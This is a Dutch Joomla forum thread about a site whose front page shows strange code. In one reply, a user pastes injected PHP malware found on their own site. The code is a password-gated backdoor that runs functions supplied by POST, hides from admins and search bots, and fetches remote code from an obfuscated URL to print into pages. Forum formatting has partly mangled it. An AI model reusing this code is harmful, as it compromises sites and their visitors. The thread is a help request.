- Ontvangen bedankjes 0
Vragen over een upgrade van Joomla! of over het maken van back-ups? Deze kan je hier stellen!
Op frontpage alleen vreemde code *
- Gast
-
- Gebruiker
-
Minder
Lees meer
24 mrt 2016 16:29 #3047
door Gast
Op frontpage alleen vreemde code * werd gestart door Gast
Beste lezers,
Ik heb een foutmelding die ik nog nooit heb gezien.
Zou iemand mij kunnen vertellen hoe ik dit zou kunnen oplossen?
Website
Alvast bedankt!
Ik heb een foutmelding die ik nog nooit heb gezien.
Zou iemand mij kunnen vertellen hoe ik dit zou kunnen oplossen?
Website
Alvast bedankt!
Discussie gesloten.
24 mrt 2016 16:29 #3048
door Rondeb
Beantwoord door Rondeb in topic Op frontpage alleen vreemde code *
Werkte de site eerst wel?
Heb je aanpassingen gedaan en toen is dit probleem ontstaan?
Groeten Ron
Heb je aanpassingen gedaan en toen is dit probleem ontstaan?
Groeten Ron
Discussie gesloten.
- Hans van der Meer
-
- Administrator
-
- Weet soms dingen
Minder
Lees meer
- Ontvangen bedankjes 2
24 mrt 2016 16:29 #3049
door Hans van der Meer
Moderator Joomlacommunity
Mede-organisator JoomlaDagen
ex Team Leader Official Joomla Social Media Team, ex-JUG-organisator & Joostock (RIP) mede-organisator
Eigen site: www.hierbenikthuis.nl
Beantwoord door Hans van der Meer in topic Op frontpage alleen vreemde code *
Hoi vervoort, ik heb de topictitel aangepast want "Fout die ik niet kan plaatsen" geeft geen informatie over het probleem.
En zoals RondeB al vraagt, als je bij je vraag ook informatie geeft kunnen we direct gerichter zoeken in plaats van eerst navragen:
Dan komen we er een stukje sneller naar de oplossing!
En zoals RondeB al vraagt, als je bij je vraag ook informatie geeft kunnen we direct gerichter zoeken in plaats van eerst navragen:
- functioneerde de website hiervoor goed of is het een nieuwe installatie?
- wat is de laatst wijziging geweest voordat dit gebeurde?
Dan komen we er een stukje sneller naar de oplossing!
Moderator Joomlacommunity
Mede-organisator JoomlaDagen
ex Team Leader Official Joomla Social Media Team, ex-JUG-organisator & Joostock (RIP) mede-organisator
Eigen site: www.hierbenikthuis.nl
Discussie gesloten.
- n9iels
-
- Gebruiker
-
Minder
Lees meer
- Ontvangen bedankjes 0
24 mrt 2016 16:29 #3050
door n9iels
Beantwoord door n9iels in topic Op frontpage alleen vreemde code *
Die foutmelding betekend simpelweg dat de map /website niet op de server bestaat. Hoewel het ook zou kunnen zijn dat er iets mis is met je .htaccess bestand.
Log even op de FTP in (of het bestandbeheer in het beheer gedeelte van je hoster), en controleer of deze map wel bestaat.
Log even op de FTP in (of het bestandbeheer in het beheer gedeelte van je hoster), en controleer of deze map wel bestaat.
Discussie gesloten.
- Gast
-
- Gebruiker
-
Minder
Lees meer
- Ontvangen bedankjes 0
24 mrt 2016 16:29 #3051
door Gast
Beantwoord door Gast in topic Op frontpage alleen vreemde code *
Hallo Vervoort,
wat was de vreemde code? Ik kan dat nu niet meer terugzien op je website.
Ik had nl. ook een 'vreemde code' als ik als administrator wilde inloggen, terwijl mijn website wel normaal draaide.
Inloggen op de back-end lukte niet meer.
Inmiddels heb ik het wel kunnen oplossen, gelukkig!
Mocht de code gelijk zijn, dan kan ik wellicht bijdragen aan de oplossing.
Was dit de code?
wat was de vreemde code? Ik kan dat nu niet meer terugzien op je website.
Ik had nl. ook een 'vreemde code' als ik als administrator wilde inloggen, terwijl mijn website wel normaal draaide.
Inloggen op de back-end lukte niet meer.
Inmiddels heb ik het wel kunnen oplossen, gelukkig!
Mocht de code gelijk zijn, dan kan ik wellicht bijdragen aan de oplossing.
Was dit de code?
Code:
[I]//istart function is_valid_url(&$url) { if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m)) return false; $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6]; return true; } function request_url_data($url) { if(!is_valid_url($url)) return false; $site_url = (preg_match('/^https?:\/\//i', $_SERVER) ? $_SERVER : 'http://' . $_SERVER . $_SERVER); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m, 80, $errno, $errstr, 6)) { fwrite($fp, 'GET [url]http://'[/url] . $m . $m["path"] . '?' . $m . ' HTTP/1.0' . "\r\n" . 'Host: ' . $m . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } function decrypt_url($encrypted_url) { $encrypted_url = base64_decode($encrypted_url); $url = ''; for ($i = 0; $i < strlen($encrypted_url); $i++) { $url .= chr(ord($encrypted_url[$i]) ^ 3); } return $url; } error_reporting(0); $_passssword = 'xxxxx'; $p = $_POST; if (@$p[$_passssword] AND @$p AND @$p) @$p[$_passssword](@$p, @$p, ''); if (!empty($_GET) AND $_GET == $_passssword) { echo(''); } unset($_passssword); $bad_url = false; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER)) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER) AND (substr(trim($_SERVER), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER)) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3dckLEM0N0M0MjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjc2Ozo7OTs0NTYyNDkyOjY2'); $url = decrypt_url('a3d3czksLDE3Mi0NixSxjsWsw8YmBmcSV2d25ccGx2cWBmPjc2Ozo7OTs0NTYyNDkyOjY2'); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend[/I]
Discussie gesloten.